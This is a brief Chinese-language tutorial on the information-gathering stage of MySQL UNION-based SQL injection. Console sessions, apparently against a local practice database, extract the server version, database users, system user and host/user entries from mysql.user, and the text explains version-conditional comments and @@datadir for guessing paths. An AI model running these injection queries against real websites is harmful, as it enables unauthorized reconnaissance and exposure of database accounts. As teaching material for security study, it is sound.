识别数据库版本有助于我们进一步对数据库进行注入我们可以用到 version() @@version /*!版本号*/
/*!*/ 意为在xxx版本之上执行 我的版本是5.6所以可以执行
mysql> SELECT * FROM admin WHERE id = 1 union select 1,version(),3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
| 1 | 5.6.30-1 | 3 |
+------+----------+----------+
2 rows in set (0.00 sec)
mysql> SELECT * FROM admin WHERE id = 1 union select 1,@@version,3;
+------+----------+----------+
| id | username | password |
+------+----------+----------+
| 1 | admin | admin |
| 1 | 5.6.30-1 | 3 |
+------+----------+----------+
2 rows in set (0.01 sec)
mysql> SELECT * FROM admin WHERE id = 1 union select 1,/*!40000 user()*/,3;
+------+----------------+----------+
| id | username | password |
+------+----------------+----------+
| 1 | admin | admin |
| 1 | root@localhost | 3 |
+------+----------------+----------+
2 rows in set (0.00 sec)
路径的话一般用@@datadir就可以了然后大概反猜下网站路径 操作系统 @@version_compile_os
system_user() //系统用户名
user() // 用户名
current_user() //当前用户名
session_user() //链接数据库的用户名
mysql> select * from users where id =1 union select system_user(),session_user(),current_user();
+--------------------+--------------------+----------+
| id | username | password |
+--------------------+--------------------+----------+
| 1 | Dumb | Dumb |
| root@192.168.1.101 | root@192.168.1.101 | root@% |
+--------------------+--------------------+----------+
2 rows in set (0.00 sec)
读取host与user
mysql> select * from users where id =1 union select 1,host,user from mysql.user;
+----+-----------+----------+
| id | username | password |
+----+-----------+----------+
| 1 | Dumb | Dumb |
| 1 | % | root |
| 1 | 127.0.0.1 | root |
| 1 | ::1 | root |
| 1 | localhost | root |
+----+-----------+----------+
5 rows in set (0.00 sec)
通过以上信息还能大概判断下是不是站库分离之类的
- author:404